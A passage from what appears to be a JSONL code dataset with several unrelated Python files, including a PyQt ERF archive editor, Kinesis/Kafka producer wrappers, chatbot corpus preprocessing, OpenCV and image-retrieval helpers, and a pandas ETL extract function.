icon(self):\n return DEFAULT_ICON\n\n @property\n def unique_id(self):\n return self._name + \"_\" + self._station\n","repo_name":"amaximus/radioactivity_hu","sub_path":"custom_components/radioactivity_hu/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"9896922812","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport json\nimport re\nimport fnmatch\n\nfrom PyQt5 import QtCore\n\nfrom PyQt5 import QtWidgets, QtGui\n\nfrom PyQt5.QtWidgets import QMessageBox\n\nfrom pynwn.file.erf import Erf\nfrom pynwn.resource import ResTypes, ContentObject\n\nfrom widgets.MainWidget import MainWidget\n\nclass 
ErfReadThread(QtCore.QThread):\n erfLoaded = QtCore.pyqtSignal(Erf)\n\n def __init__(self, parent=None):\n super(ErfReadThread, self).__init__(parent)\n\n def setFileName(self, name):\n self.file_name = name\n\n def run(self):\n try:\n erf = Erf.from_file(self.file_name)\n except:\n erf = Erf('HAK')\n self.erfLoaded.emit(erf)\n\n def begin(self):\n self.start()\n\nclass ErfSortFilterProxyModel(QtCore.QSortFilterProxyModel):\n def __init__(self, parent=None):\n super(ErfSortFilterProxyModel, self).__init__(parent)\n self.filters = {}\n\n def setFilter(self, idx, pat):\n if len(pat):\n self.filters[idx] = pat\n else:\n self.filters.pop(idx, None)\n self.invalidateFilter()\n\n def filterAcceptsRow(self, sourceRow, sourceParent):\n if 1 in self.filters:\n idx = self.sourceModel().index(sourceRow, 1, sourceParent)\n if not re.match(self.filters[1], idx.data()):\n return False\n if 0 in self.filters:\n idx = self.sourceModel().index(sourceRow, 0, sourceParent)\n if not fnmatch.fnmatch(idx.data(), self.filters[0]):\n return False\n\n return True\n\nclass ErfGridModel(QtCore.QAbstractTableModel):\n columnNames = ['Resource', 'Type', 'Size (bytes)']\n\n def __init__(self, erf, parent=None, *args):\n super(ErfGridModel, self).__init__()\n self.erf = erf\n\n def rowCount(self, parent=QtCore.QModelIndex()):\n return len(self.erf)\n\n def columnCount(self, parent=QtCore.QModelIndex()):\n return 3\n\n def data(self, index, role=QtCore.Qt.DisplayRole):\n i = index.row()\n j = index.column()\n if role == QtCore.Qt.DisplayRole or role == QtCore.Qt.EditRole:\n co = self.erf.get_content_object(i)\n if j == 0:\n return co.resref\n elif j == 1:\n return ResTypes[co.res_type]\n elif j == 2:\n return co.size\n elif role == QtCore.Qt.TextAlignmentRole:\n if j == 1 or j == 2:\n return QtCore.Qt.AlignCenter\n else:\n return QtCore.QVariant()\n\n def flags(self, index):\n defaultFlags = QtCore.QAbstractTableModel.flags(self, index)\n if index.isValid():\n return QtCore.Qt.ItemIsDragEnabled | QtCore.Qt.ItemIsDropEnabled | defaultFlags\n else:\n return QtCore.Qt.ItemIsDropEnabled | defaultFlags;\n\n def headerData(self, section, orientation, role):\n if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:\n return self.columnNames[section]\n\n def setData(self, index, value, role):\n if not index.isValid() or role != QtCore.Qt.EditRole: return False\n i = index.row()\n j = index.column()\n\n return False\n\n def addFiles(self, files):\n for f in files:\n self.erf.add_file(f)\n self.layoutChanged.emit()\n\n def deleteFiles(self, files):\n if not len(files): return\n for f in files:\n self.erf.remove(f)\n self.layoutChanged.emit()\n\nclass MainWindow(QtWidgets.QMainWindow):\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n\n self.settings = QtCore.QSettings()\n self.recentFiles = []\n self.readSettings()\n self.current_row = 0\n self.mainWidget = MainWidget(self)\n self.setCentralWidget(self.mainWidget)\n self.mainWidget.filterEdit.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp('([a-zA-Z0-9_\\?\\*]+ ?)*')))\n self.mainWidget.resourceTable.needNewErf.connect(self.newErf)\n self.grid_model = None\n self.proxy = None\n self.modified = False\n self.fileName = None\n self.current_stack = 0\n self.createActions()\n self.createMenus()\n self.initTypeCombo()\n self.setWindowTitle(\"ErfEd\")\n self.resize(500, 600)\n self.thread = ErfReadThread(self)\n self.thread.erfLoaded.connect(self.erfReady)\n hh = self.mainWidget.resourceTable.horizontalHeader()\n 
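# route header clicks through our own handler so the sort order can be toggled\n        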
hh.sectionClicked.connect(self.onHeaderSectionClicked)\n self.mainWidget.descriptionText.textChanged.connect(self.descrptionChanged)\n\n def onPreviousButton(self):\n if self.current_row == 0: return\n self.current_row -= 1\n self.changeRow(self.current_row)\n\n def onNextButton(self):\n if self.current_row + 1 >= len(self.erf.rows): return\n self.current_row += 1\n self.changeRow(self.current_row)\n\n def changeRow(self, row):\n self.row_model.setRow(row)\n self.current_row = row\n\n def openErfFile(self):\n fname, _ = QtWidgets.QFileDialog.getOpenFileName(self,\n \"Open Erf File\", '',\n \"ERF Files (*.erf *.mod *.hak)\")\n if fname:\n self.open(fname)\n\n def openRecent(self):\n act = self.sender()\n if not act is None:\n fname = act.data()\n self.open(fname)\n\n def newErf(self):\n self.fileName = None\n self.setErfObject(Erf('HAK'))\n\n def erfReady(self, erf):\n self.setErfObject(erf)\n self.progress.hide()\n self.progress = None\n\n def open(self, fname):\n if self.modified and self.checkSave() == QMessageBox.Save:\n self.save()\n\n self.fileName = fname\n self.progress = QtWidgets.QProgressDialog('Loading...', None, 0, 0, self, QtCore.Qt.SplashScreen)\n self.progress.setValue(0)\n self.progress.show()\n self.setErfObject(Erf('HAK'))\n self.thread.setFileName(self.fileName)\n self.thread.begin()\n\n self.recentFiles = [f for f in self.recentFiles if f.lower() != self.fileName.lower()]\n\n if len(self.recentFiles) >= 10:\n self.recentFiles.pop()\n\n self.recentFiles.insert(0, self.fileName)\n for i, fname in enumerate(self.recentFiles):\n self.recentFileActs[i].setText(\"&%d - %s\" % (i+1, fname))\n self.recentFileActs[i].setData(fname)\n self.recentFileActs[i].setVisible(True)\n\n\n def about(self):\n QtWidgets.QMessageBox.about(self, \"About Erf\",\n \"Edit Erf files\")\n\n def createActions(self):\n self.newErfFileAct = QtWidgets.QAction(\"&New\", self,\n shortcut=\"Ctrl+N\",\n triggered=self.newErf)\n\n self.openErfFileAct = QtWidgets.QAction(\"&Open\", self,\n shortcut=\"Ctrl+O\",\n triggered=self.openErfFile)\n\n self.saveAct = QtWidgets.QAction(\"&Save\", self,\n shortcut=\"Ctrl+S\", triggered=self.save)\n\n self.saveAsAct = QtWidgets.QAction(\"Save As...\", self,\n shortcut=\"Ctrl+Alt+S\", triggered=self.saveAs)\n\n self.exitAct = QtWidgets.QAction(\"E&xit\", self, shortcut=\"Ctrl+Q\",\n triggered=self.close)\n\n self.aboutAct = QtWidgets.QAction(\"&About\", self, triggered=self.about)\n\n self.aboutQtAct = QtWidgets.QAction(\"About &Qt\", self,\n triggered=QtWidgets.QApplication.instance().aboutQt)\n\n self.exportAct = QtWidgets.QAction(\"&Export\", self,\n shortcut=\"Ctrl+E\",\n triggered=self.export)\n\n self.exportAllAct = QtWidgets.QAction(\"Export All\", self, triggered=self.exportAll)\n\n def export(self):\n path = QtWidgets.QFileDialog.getExistingDirectory(self, 'Export To...'\n '.')\n select = self.mainWidget.resourceTable.selectionModel().selectedRows()\n for s in select:\n idx = self.mainWidget.resourceTable.model().index(s.row(), 0)\n resref = idx.data()\n idx = self.mainWidget.resourceTable.model().index(s.row(), 1)\n ext = idx.data()\n fname = '%s.%s' % (resref, ext)\n co = self.erf.get_content_object(fname)\n co.write_to(os.path.join(path, fname))\n\n def exportAll(self):\n path = QtWidgets.QFileDialog.getExistingDirectory(self, 'Export To...'\n '.')\n for co in self.erf.content:\n co.write_to(os.path.join(path, co.get_filename()))\n\n def createMenus(self):\n self.fileMenu = self.menuBar().addMenu(\"&File\")\n self.fileMenu.addAction(self.newErfFileAct)\n 
self.fileMenu.addAction(self.openErfFileAct)\n self.fileMenu.addSeparator()\n self.fileMenu.addAction(self.saveAct)\n self.fileMenu.addAction(self.saveAsAct)\n self.fileMenu.addSeparator()\n self.recentMenu = self.fileMenu.addMenu('Recent')\n\n self.recentFileActs = []\n for i in range(10):\n act = QtWidgets.QAction(self)\n act.setVisible(False)\n act.triggered.connect(self.openRecent)\n self.recentMenu.addAction(act)\n self.recentFileActs.append(act)\n\n for i, fname in enumerate(self.recentFiles):\n self.recentFileActs[i].setText(\"&%d - %s\" % (i+1, fname))\n self.recentFileActs[i].setData(fname)\n self.recentFileActs[i].setVisible(True)\n\n self.fileMenu.addSeparator()\n self.fileMenu.addAction(self.exitAct)\n\n self.resMenu = self.menuBar().addMenu(\"&Resource\")\n self.resMenu.addAction(self.exportAct)\n self.resMenu.addAction(self.exportAllAct)\n\n self.mainWidget.typeCombo.currentIndexChanged.connect(self.onTypeComboChanged)\n self.mainWidget.filterEdit.editingFinished.connect(self.onFilterChanged)\n self.menuBar().addSeparator()\n self.helpMenu = self.menuBar().addMenu(\"&Help\")\n self.helpMenu.addAction(self.aboutAct)\n self.helpMenu.addAction(self.aboutQtAct)\n\n def onTypeComboChanged(self, idx):\n if not self.proxy is None:\n text = self.mainWidget.typeCombo.currentText()\n if text == 'All':\n self.proxy.setFilter(1, '')\n else:\n self.proxy.setFilter(1, text)\n\n def onFilterChanged(self):\n if not self.proxy is None:\n self.proxy.setFilter(0, self.mainWidget.filterEdit.text())\n\n def updateModels(self, erf):\n # Grid model\n self.grid_model = ErfGridModel(erf)\n self.proxy = ErfSortFilterProxyModel(self)\n self.proxy.setSourceModel(self.grid_model)\n self.proxy.sort(0)\n self.mainWidget.resourceTable.setModel(self.proxy)\n self.mainWidget.typeCombo.setCurrentIndex(0)\n self.grid_model.layoutChanged.connect(self.changed)\n self.loaded = False\n hh = self.mainWidget.resourceTable.horizontalHeader()\n hh.setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)\n\n def onHeaderSectionClicked(self, idx):\n if self.proxy.sortOrder() == QtCore.Qt.AscendingOrder:\n order = QtCore.Qt.DescendingOrder\n else:\n order = QtCore.Qt.AscendingOrder\n\n self.proxy.sort(idx, order)\n\n def setErfObject(self, erf):\n self.erf = erf\n self.mainWidget.descriptionText.setPlainText(erf.description(0))\n self.updateModels(erf)\n self.setModified(False)\n\n def descrptionChanged(self):\n if self.erf.description(0) != self.mainWidget.descriptionText.toPlainText():\n self.erf.set_description(self.mainWidget.descriptionText.toPlainText(), 0)\n self.setModified(True)\n\n def changed(self):\n self.setModified(True)\n\n def initTypeCombo(self):\n self.mainWidget.typeCombo.addItem('All')\n self.mainWidget.typeCombo.addItems(sorted([v for _, v in ResTypes.items()]))\n\n def setModified(self, modified):\n self.modified = modified\n if self.fileName is None:\n if modified:\n self.setWindowTitle(\"ErfEd - unnamed*\")\n else:\n self.setWindowTitle(\"ErfEd - unnamed\")\n elif self.modified:\n self.setWindowTitle(\"ErfEd - %s*\" % os.path.basename(self.fileName))\n else:\n self.setWindowTitle(\"ErfEd - %s\" % os.path.basename(self.fileName))\n\n def saveAndReload(self, fileName):\n self.erf.write_to(self.fileName)\n self.setModified(False)\n self.open(self.fileName)\n\n def save(self):\n if self.erf is None: return\n if not self.fileName:\n self.saveAs()\n else:\n self.saveAndReload(self.fileName)\n\n def saveAs(self):\n fileName, _ = QtWidgets.QFileDialog.getSaveFileName(self, \"Open Erf File\",\n 
self.fileName,\n                                                            \"ERF Files (*.hak *.mod *.erf)\")\n\n        if fileName:\n            ext = os.path.splitext(fileName)[1][1:].upper()\n            if self.erf.ftype != ext and ext in Erf.TYPES:\n                self.erf.ftype = ext\n            self.fileName = fileName\n            self.saveAndReload(fileName)\n\n    def readSettings(self):\n        size = self.settings.beginReadArray('Recent Files')\n        for i in range(size):\n            self.settings.setArrayIndex(i)\n            self.recentFiles.append(self.settings.value('file'))\n        self.settings.endArray()\n\n\n    def writeSettings(self):\n        self.settings.beginWriteArray('Recent Files', len(self.recentFiles))\n        for i, fname in enumerate(self.recentFiles):\n            self.settings.setArrayIndex(i)\n            self.settings.setValue('file', fname)\n        self.settings.endArray()\n        self.settings.setValue(\"Window/geometry\", self.saveGeometry())\n\n    def restoreWindow(self):\n        geom = self.settings.value(\"Window/geometry\")\n        if geom is not None:\n            self.restoreGeometry(geom)\n\n    def checkSave(self):\n        msgBox = QMessageBox()\n        msgBox.setText(\"The file has been modified.\")\n        msgBox.setInformativeText(\"Do you want to save your changes?\")\n        msgBox.setStandardButtons(QMessageBox.Save | QMessageBox.Discard | QMessageBox.Cancel)\n        msgBox.setDefaultButton(QMessageBox.Save)\n        return msgBox.exec()\n\n    def closeEvent(self, event):\n        if self.modified:\n            ret = self.checkSave()\n            if ret == QMessageBox.Save:\n                self.save()\n            elif ret == QMessageBox.Cancel:\n                event.ignore()\n\n        self.writeSettings()\n\n\nif __name__ == '__main__':\n    app = QtWidgets.QApplication(sys.argv)\n    QtCore.QCoreApplication.setOrganizationName(\"jmd\")\n    QtCore.QCoreApplication.setOrganizationDomain(\"jmdean.me\")\n    QtCore.QCoreApplication.setApplicationName(\"ErfEd\")\n\n    mainWin = MainWindow()\n    mainWin.restoreWindow()\n    if len(sys.argv) > 1:\n        f = QtCore.QFileInfo(os.path.abspath(sys.argv[1]))\n        mainWin.open(f.filePath())\n    mainWin.show()\n    app.exec()\n","repo_name":"jd28/pynwn-tools","sub_path":"ErfEd/ErfEd.py","file_name":"ErfEd.py","file_ext":"py","file_size_in_byte":15481,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"4265943122","text":"import boto\nfrom boto.regioninfo import RegionInfo\nfrom boto.kinesis.exceptions import ResourceNotFoundException\nimport os\nfrom configparser import ConfigParser\nfrom kafka import KafkaProducer\nimport json\n\n\nclass StreamProducer:\n    \"\"\"\n    a client stream producer class supporting the following stream\n    types:\n    ['kinesis', 'kafka']\n    default stream_type is 'kinesis'\n    \"\"\"\n    def __init__(self, stream_name, stream_platform='kinesis', hosts=None, conn=None):\n        \"\"\"\n        :param stream_name:\n        :param part_key:\n        :param stream_platform:\n        :param hosts: for kafka\n        :param conn: for kinesis\n        \"\"\"\n        ConnectParameterValidation.validate(stream_platform, conn, hosts)\n        self.type = stream_platform\n\n        # if conn and hosts:\n        #     raise ValueError('either a conn object OR hosts should be used. 
Not both!')\n\n # can we make this resolution elsewhere?\n # take out to separate method?\n if stream_platform == 'kinesis':\n conn_args = conn, stream_name\n elif stream_platform == 'kafka':\n conn_args = hosts, stream_name\n else:\n raise ValueError('unknown platform!')\n\n self._producer = self._get_producer()(*conn_args)\n\n def put_records(self, messages, part_key=None):\n producer = self._producer\n if self.type == 'kinesis':\n assert part_key is not None, \"For kinesis app the part_key arg should not be None\"\n\n producer.put_records(messages, part_key)\n print('DONE!')\n\n def put_record(self, message, part_key=None):\n if self.type == 'kinesis':\n assert part_key is not None, \"For kinesis app the part_key arg should not be None\"\n\n producer = self._producer\n producer.put_record(message)\n\n def _get_producer(self):\n if self.type == 'kinesis':\n return KinesisProducer\n elif self.type == 'kafka':\n return KafkaProducerWrapper\n else:\n raise ValueError('! unknown stream type: {}'.format(self.type))\n\n\nclass KinesisProducer:\n \"\"\"\n a Kinesis Stream producer class responsible for pushing\n messages into an AWS Kinesis Stream\n \"\"\"\n\n def __init__(self, kinesis_con, stream_name):\n self.stream_name = stream_name\n self.kinesis_con = kinesis_con\n\n def put_record(self, msg, part_key):\n self.kinesis_con.put_record(self.stream_name, msg, part_key)\n\n def put_records(self, msgs, part_key):\n for m in msgs:\n self.put_record(m, part_key)\n\n\nclass KinesisStreamHealthCheck:\n \"\"\"\n a Kinesis stream health checker to get information on\n a given stream's operability\n \"\"\"\n def __init__(self, stream_conn, stream_name):\n self._stream_connection = stream_conn\n self.stream_name = stream_name\n\n def check_active(self):\n return self._check_status() == 'ACTIVE'\n\n def check_deleting(self):\n return self._check_status() == 'DELETING'\n\n def _check_status(self):\n description_map = self._stream_connection.describe_stream(self.stream_name)\n description = description_map.get('StreamDescription')\n return description.get('StreamStatus')\n\n\nclass KafkaProducerWrapper:\n \"\"\"\n Kafka stream producer\n \"\"\"\n def __init__(self, hosts, topic_name):\n self.producer = KafkaProducer(bootstrap_servers=hosts,\n value_serializer=lambda x: json.dumps(x).encode('utf-8'))\n self.topic_name = topic_name\n\n def put_record(self, msg, part_key=None):\n self.producer.send(self.topic_name, msg, partition=part_key)\n\n def put_records(self, msgs, part_key=None):\n for msg in msgs:\n self.put_record(msg, part_key=part_key)\n self.producer.flush()\n\n\nclass ConnectionConfig:\n def __init__(self, platform):\n self.platform = platform\n\n def get(self):\n if self.platform == 'kinesis':\n return 'conn'\n elif self.platform == 'kafka':\n return 'hosts'\n else:\n raise ValueError('platform {} not supported!'.format(\n self.platform\n ))\n\n\nclass ConnectParameterValidation:\n @staticmethod\n def validate(platform, conn, hosts):\n _allowed_platforms = ('kinesis', 'kafka')\n\n if platform not in _allowed_platforms:\n raise ValueError(\"unknown platform '{}'! 
supported: {}\".format(\n platform,\n _allowed_platforms))\n\n if platform == 'kinesis' and not conn:\n raise ValueError('conn argument must be specified for a {} app'.format(\n platform\n ))\n\n elif platform == 'kafka' and not hosts:\n raise ValueError('conn argument must be specified for a {} app'.format(\n platform\n ))\n\n else:\n return\n\n","repo_name":"dron-dronych/streamz","sub_path":"producers.py","file_name":"producers.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16365482340","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom src.utils.annoy_utils import get_embedding\n\n\ndef normalized_img_tensor_to_rgb(img):\n rgb_img = img.numpy().transpose((1, 2, 0))\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n rgb_img = std * rgb_img + mean\n rgb_img = np.clip(rgb_img, 0, 1)\n\n return rgb_img\n\n\ndef show_img(dataset, idx):\n img, class_id, superclass_id = dataset[idx]\n\n fig = plt.figure()\n rows, cols = 1, 1\n fig.add_subplot(rows, cols, 1)\n rgb_img = normalized_img_tensor_to_rgb(img)\n plt.imshow(rgb_img)\n\n plt.axis('off')\n plt.title('Image')\n print(f'Class id: {class_id}\\nSuper Class id: {superclass_id}\\n')\n\n\ndef show_retrieval(model, annoy_index, train_dataset, test_dataset, k_closest):\n length_test_dataset = len(test_dataset)\n\n plt.rcParams['figure.figsize'] = [15, 10]\n rows, cols = 5, 5\n f, axarr = plt.subplots(rows, cols)\n for row in range(rows):\n img_idx = random.randint(1, length_test_dataset - 1)\n img, true_class_id, true_superclass_id = test_dataset[img_idx]\n embedding = get_embedding(model, img)\n neighbours = annoy_index.get_nns_by_vector(embedding, k_closest) # get top k closest\n\n axarr[row, 0].imshow(normalized_img_tensor_to_rgb(img))\n axarr[row, 0].axis('off')\n axarr[row, 0].set_title(f'True Superclass {true_superclass_id}\\nTrue Class {true_class_id}')\n\n for col in range(1, cols):\n axarr[row, col].axis('off')\n if col - 1 >= len(neighbours):\n break\n\n img, pred_class_id, pred_superclass_id = train_dataset[neighbours[col - 1]]\n axarr[row, col].imshow(normalized_img_tensor_to_rgb(img))\n axarr[row, col].spines['bottom'].set_color('0.5')\n axarr[row, col].set_title(f'Predicted Superclass {pred_superclass_id}\\nPredicted Class {pred_class_id}')\n\n plt.subplots_adjust(top=1.4, bottom=0.01)\n line = plt.Line2D((.27, .27), (0, 1.4), color=\"grey\", linewidth=3, linestyle='--')\n f.add_artist(line)\n","repo_name":"denysgerasymuk799/UCU_CV_Metric_Learning_HW","sub_path":"src/utils/viz_utils.py","file_name":"viz_utils.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39915307924","text":"import os\nimport random\nimport codecs\nimport csv\nimport re\nimport unicodedata\nfrom ast import literal_eval\n\n\ndef printLines(file, n=10):\n '''function to print the first 10 lines of text'''\n with open(file, 'rb') as datafile:\n lines = datafile.readlines()\n for line in lines[:n]:\n print(line)\n\nclass load_corpus:\n def __init__(self, corpus_path):\n self.filepath = corpus_path\n \n # Splits each line of the file into a dictionary of fields\n def loadLines(self, fileName, fields):\n lines = {}\n with open(fileName, 'r', encoding='iso-8859-1') as f:\n for line in f:\n values = line.split(\" +++$+++ \")\n # Extract fields\n lineObj = {}\n for i, field in enumerate(fields):\n 
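# store each ' +++$+++ '-separated value under its field name\n                    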
lineObj[field] = values[i]\n lines[lineObj['lineID']] = lineObj\n return lines\n \n \n # Groups fields of lines from `loadLines` into conversations based on *movie_conversations.txt*\n def loadConversations(self, fileName, lines, fields):\n conversations = []\n with open(fileName, 'r', encoding='iso-8859-1') as f:\n for line in f:\n values = line.split(\" +++$+++ \")\n # Extract fields\n convObj = {}\n for i, field in enumerate(fields):\n convObj[field] = values[i]\n # Convert string to list (convObj[\"utteranceIDs\"] == \"['L598485', 'L598486', ...]\")\n lineIds = eval(convObj[\"utteranceIDs\"])\n # Reassemble lines\n convObj[\"lines\"] = []\n for lineId in lineIds:\n convObj[\"lines\"].append(lines[lineId])\n conversations.append(convObj)\n return conversations\n \n \n # Extracts pairs of sentences from conversations\n def extractSentencePairs(self, conversations):\n qa_pairs = []\n for conversation in conversations:\n # Iterate over all the lines of the conversation\n for i in range(len(conversation[\"lines\"]) - 1): # We ignore the last line (no answer for it)\n inputLine = conversation[\"lines\"][i][\"text\"].strip()\n targetLine = conversation[\"lines\"][i+1][\"text\"].strip()\n # Filter wrong samples (if one of the lists is empty)\n if inputLine and targetLine:\n qa_pairs.append([inputLine, targetLine])\n return qa_pairs\n\n\nclass Voc:\n def __init__(self, name):\n \n # Default word tokens\n PAD_token = 0 # Used for padding short sentences\n SOS_token = 1 # Start-of-sentence token\n EOS_token = 2 # End-of-sentence token\n \n self.name = name\n self.trimmed = False\n self.word2index = {}\n self.word2count = {}\n self.index2word = {PAD_token: \"PAD\", SOS_token: \"SOS\", EOS_token: \"EOS\"}\n self.num_words = 3 # Count SOS, EOS, PAD\n\n def addSentence(self, sentence):\n for word in sentence.split(' '):\n self.addWord(word)\n\n def addWord(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.num_words\n self.word2count[word] = 1\n self.index2word[self.num_words] = word\n self.num_words += 1\n else:\n self.word2count[word] += 1\n\n # Remove words below a certain count threshold\n def trim(self, min_count):\n if self.trimmed:\n return\n self.trimmed = True\n\n keep_words = []\n\n for k, v in self.word2count.items():\n if v >= min_count:\n keep_words.append(k)\n\n print('keep_words {} / {} = {:.4f}'.format(\n len(keep_words), len(self.word2index), len(keep_words) / len(self.word2index)\n ))\n\n # Reinitialize dictionaries\n \n # Default word tokens\n PAD_token = 0 # Used for padding short sentences\n SOS_token = 1 # Start-of-sentence token\n EOS_token = 2 # End-of-sentence token\n \n self.word2index = {}\n self.word2count = {}\n self.index2word = {PAD_token: \"PAD\", SOS_token: \"SOS\", EOS_token: \"EOS\"}\n self.num_words = 3 # Count default tokens\n\n for word in keep_words:\n self.addWord(word) \n \n \n \n# Turn a Unicode string to plain ASCII, thanks to\n# http://stackoverflow.com/a/518232/2809427\n \nclass trim_pair:\n \n def __init__(self, MAX_LENGTH):\n self.MAX_LENGTH = MAX_LENGTH\n \n def unicodeToAscii(self, s):\n return ''.join(\n c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn'\n )\n \n # Lowercase, trim, and remove non-letter characters\n def normalizeString(self, s):\n s = self.unicodeToAscii(s.lower().strip())\n s = re.sub(r\"([.!?])\", r\" \\1\", s)\n s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\n s = re.sub(r\"\\s+\", r\" \", s).strip()\n return s\n \n # Read query/response pairs and return a voc object\n def 
readVocs(self, datafile, corpus_name):\n        print(\"Reading lines...\")\n        # Read the file and split into lines\n        lines = open(datafile, encoding='utf-8').\\\n            read().strip().split('\\n')\n        # Split every line into pairs and normalize\n        pairs = [[self.normalizeString(s) for s in l.split('\\t')] for l in lines]\n        voc = Voc(corpus_name)\n        return voc, pairs\n    \n    # Returns True iff both sentences in a pair 'p' are under the MAX_LENGTH threshold\n    def filterPair(self, p):\n        return len(p[0].split(' ')) <= self.MAX_LENGTH and len(p[1].split(' ')) <= self.MAX_LENGTH\n    \n    # Filter pairs using filterPair condition\n    def filterPairs(self, pairs):\n        return [pair for pair in pairs if self.filterPair(pair)]\n    \n    # Using the functions defined above, return a populated voc object and pairs list\n    def loadPrepareData(self, corpus, corpus_name, datafile, save_dir):\n        print(\"Start preparing training data ...\")\n        voc, pairs = self.readVocs(datafile, corpus_name)\n        print(\"Read {!s} sentence pairs\".format(len(pairs)))\n        pairs = self.filterPairs(pairs)\n        print(\"Trimmed to {!s} sentence pairs\".format(len(pairs)))\n        print(\"Counting words...\")\n        for pair in pairs:\n            voc.addSentence(pair[0])\n            voc.addSentence(pair[1])\n        print(\"Counted words:\", voc.num_words)\n        return voc, pairs\n\n    \ndef trimRareWords(voc, pairs, MIN_COUNT):\n    # Trim words used under the MIN_COUNT from the voc\n    voc.trim(MIN_COUNT)\n    # Filter out pairs with trimmed words\n    keep_pairs = []\n    for pair in pairs:\n        input_sentence = pair[0]\n        output_sentence = pair[1]\n        keep_input = True\n        keep_output = True\n        # Check input sentence\n        for word in input_sentence.split(' '):\n            if word not in voc.word2index:\n                keep_input = False\n                break\n        # Check output sentence\n        for word in output_sentence.split(' '):\n            if word not in voc.word2index:\n                keep_output = False\n                break\n\n        # Only keep pairs that do not contain trimmed word(s) in their input or output sentence\n        if keep_input and keep_output:\n            keep_pairs.append(pair)\n\n    print(\"Trimmed from {} pairs to {}, {:.4f} of total\".format(len(pairs), len(keep_pairs), len(keep_pairs) / len(pairs)))\n    return keep_pairs","repo_name":"ZhicongChu369/ChatBot","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":7536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22838095718","text":"import cv2\r\n\r\n## read and show an image\r\nimg = cv2.imread('lena.jpg', 0) # reads an image; flag -1,0,1 -> unchanged, grayscale, color\r\nprint(img) # print the image matrix\r\ncv2.imshow('image', img) # show the image in a window\r\nk = cv2.waitKey(5000) # wait the given milliseconds before the window disappears; with value 0 we have to close the image or press a key\r\n\r\n## save on 's' key press and destroy the window on 'esc' key press\r\nif k == 27 : # 27 is the ASCII value for the esc key\r\n\tcv2.destroyAllWindows() # destroys all windows that were created; use destroyWindow() to destroy a single window \r\nelif k == ord('s') or k == ord('S'): # ord takes one character and returns its ASCII value\r\n\t## write an image\r\n\tcv2.imwrite('lena_copy.png', img) # writes the image in any image format\r\n\tcv2.destroyAllWindows()\r\n\r\n\r\n\r\n\r\n","repo_name":"saurabh-maurya/Computer-Vision-using-OpenCV","sub_path":"1.getting_started_with_images.py","file_name":"1.getting_started_with_images.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} 
+{"seq_id":"38923730883","text":"import random\n\ndef num_in_col(input_col):\n return all(char.isdigit() for char in input_col)\n\ndef roll_d(dice, rolls=1):\n '''Rolls a dice, multiple times if specified, and returns the total.\n\n Args:\n dice (int): The number of faces\n rolls (int): The number of rolls. (default=1)\n \n Returns:\n The total of all of the rolls.\n '''\n total = 0\n for i in range(rolls):\n total += random.randint(1,dice)\n if rolls == 1 and total == dice:\n print(\"You rolled a natural {}!\".format(total))\n return total\n\ndef convert_str_to_pairs(flat_list, key_map_fn, val_map_fn, key_check=None, val_check=None):\n ''' Converts a string into a list of (key, value) pairs.\n\n Args:\n flat_list (str): The string representation of the pairs (\" ...\")\n key_map_fn (func): The function to be mapped to keys\n val_map_fn (func): The function to be mapped to values\n key_check (func): Returns if key is valid type. (default=None)\n val_check (func): Returns if value is valid type. (default=None)\n \n Returns:\n The new list of pairs, or None if error\n '''\n\n flat_list = flat_list.split()\n if len(flat_list) == 0 or len(flat_list) % 2 != 0:\n print(\"ERROR: invalid list length: {}\".format(flat_list))\n return None\n \n keys = flat_list[0::2]\n if key_check and not key_check(keys):\n print(\"Error: Invalid keys: {}\".format(keys))\n return None\n keys = map(key_map_fn, keys)\n \n values = flat_list[1::2]\n if val_check and not val_check(values):\n print(\"Error: Invalid values: {}\".format(values))\n return None\n values = map(val_map_fn, values)\n\n return zip(keys, values)","repo_name":"SheldonSChen/dnd","sub_path":"sharedHelpers.py","file_name":"sharedHelpers.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22644380897","text":"import pandas as pd\nimport traceback\n\ndef ext_calificacion_sc(ses_db_stg):\n try:\n #Diccionario de los valores\n path = \"csvs/calificacion_sc.csv\"\n calificacion_dic = {\n \"id_cal\" : [],\n \"nombre_cal\" : [],\n }\n\n calificacion_csv = pd.read_csv(path)\n\n #Procesar los archivos csv\n\n if not calificacion_csv.empty:\n for id, cal \\\n in zip(calificacion_csv['ID_CAL'],\n calificacion_csv['NOMBRE_CAL']):\n\n calificacion_dic[\"id_cal\"].append(id),\n calificacion_dic[\"nombre_cal\"].append(cal)\n if calificacion_dic[\"id_cal\"]:\n ses_db_stg.connect().execute(\"TRUNCATE TABLE calificacion_sc_ext\")\n df_calificacion_sc_ext = pd.DataFrame(calificacion_dic)\n df_calificacion_sc_ext.to_sql('calificacion_sc_ext',\n ses_db_stg, \n if_exists='append',\n index=False)\n\n except:\n traceback.print_exc()\n finally:\n 